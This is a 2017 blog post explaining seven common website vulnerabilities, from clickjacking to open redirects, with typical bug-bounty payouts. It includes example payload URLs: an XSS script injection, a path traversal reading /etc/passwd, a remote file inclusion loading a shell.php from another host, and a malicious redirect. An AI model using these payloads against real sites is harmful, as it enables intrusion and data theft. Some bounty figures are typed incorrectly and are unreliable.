Tuesday, 19 September 2017
0 comments

Top 7 Common Website Vulnerabilities You Should Know

Top 5 Common Website Vulnerabilities You Should Know


Top 7 Common Website Vulnerabilities You Should Know


"No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer." - Chris Shiflett

Any bug in a website that can be exploited by a researcher or hacker is known as website vulnerability. So today, we will be discussing about the most common vulnerabilities websites have. There is no doubt that there are many security systems available and used for protecting websites from common cyber threats but still many times a hacker manages to breach into the websites.

So it is very important for administrators as well as for developers to have a comprehensive knowledge of these attacks and it should also be noted that different kind of web applications lead to various types of attacks than those listed here.

This article covers some of the most critical points found in numerous white papers and various articles across the web on Common Vulnerabilities.

1. Clickjacking:


Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable. When an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page.

Thus, the attacker is “hijacking” clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack.  read more

Bug Bounty: $100- $700USD

2. Cross Site Scripting:

‘XSS’ also known as ‘CSS’ – Cross Site Scripting.

It is a very common vulnerability found in Web Applications, ‘XSS’ allows the attacker to INSERT malicious code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an “attacker” to inject some code into the applications affected in order to bypass access to the website or to apply “phishing” on falls users.

Screenshot of Cross Site Scripting Vulnerability

Types of XSS:

There are actually three types of Cross-Site Scripting, commonly named as:
  • DOM-Based XSS
  • Non-persistent XSS
  • Persistent XSS

DOM XSS

The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine.

 The attacker creates a well built malicious website
– The ingenious user opens that site
– The user has a vulnerable page on his machine
– The attacker’s website sends commands to the vulnerable HTML page
– The vulnerable local page execute that commands with the user’s privileges on that machine.
– The attacker easily gain control on the victim computer.


Non-Persistent XSS:

The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the web page get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

Persistent XSS: 

The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users information and the difference is that in websites vulnerable to Persistent XSS the attacker doesn’t need to provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system.

Once a attacker finds vulnerable website they can try to inject malicious script code into data that is going to be stored into the server. They, they will access the some of the web pages.

Example:
https://website.com/search.php?q="><script>alert('Priyanshu')</script>

Bug Bounty: $100-$1500USD

Find here: New and Advance XSS Payloads


3. Cross-Site Request Forgery CSRF


Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user's session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged request sent by the victim and a legitimate request sent by the victim.

CSRF attacks target functionality that causes a state change on the server, such as changing the victim's email address or password, or purchasing something. Forcing the victim to retrieve data doesn't benefit an attacker because the attacker doesn't receive the response, the victim does. As such, CSRF attacks target state-changing requests.


4. Remote Code Execution


Remote Code Execution  is in the top of the vulnerability in Website Hacking.

Through remote code execution the cyber criminal can exploits a bug in the system and inject the malware, then it will exploit the vulnerability and help the cyber attacker to the execute the code remotely. It's look like cyber criminal have control over of your entire computer system with all admin privileges.


If the Bug hunter finds Remote Code Execution Vulnerability in any company, they can give 3000$-20000$.

Bug Bounty: $3,000-$200,00USD


5. Local File Inclusion (LFI) and Remote File Inclusion (RFI)

A File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.


Local File Inclusion :

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.

Example:
http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd


Remote File Inclusion:

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

If allow_url_include is On in php.ini, then we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension).

Example:
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php

Bounty: $500-$3000


6. SQL Injection Attack

SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server. 

Read more: How it works?

Bounty: $500$- $100,00USD

7. Open URL Redirection Vulnerability

An open redirect vulnerability is an application that takes a parameter and redirect a user to the parameter value without any validation. This Vulnerability can be used in Phishing attacks to get users to visit malicious website. 

Example: 
http://xyz.com/example.php?url=http://redirectmalicious.com

Bounty: $100$- $1500USD

0 comments:

Post a Comment

 
Toggle Footer
Top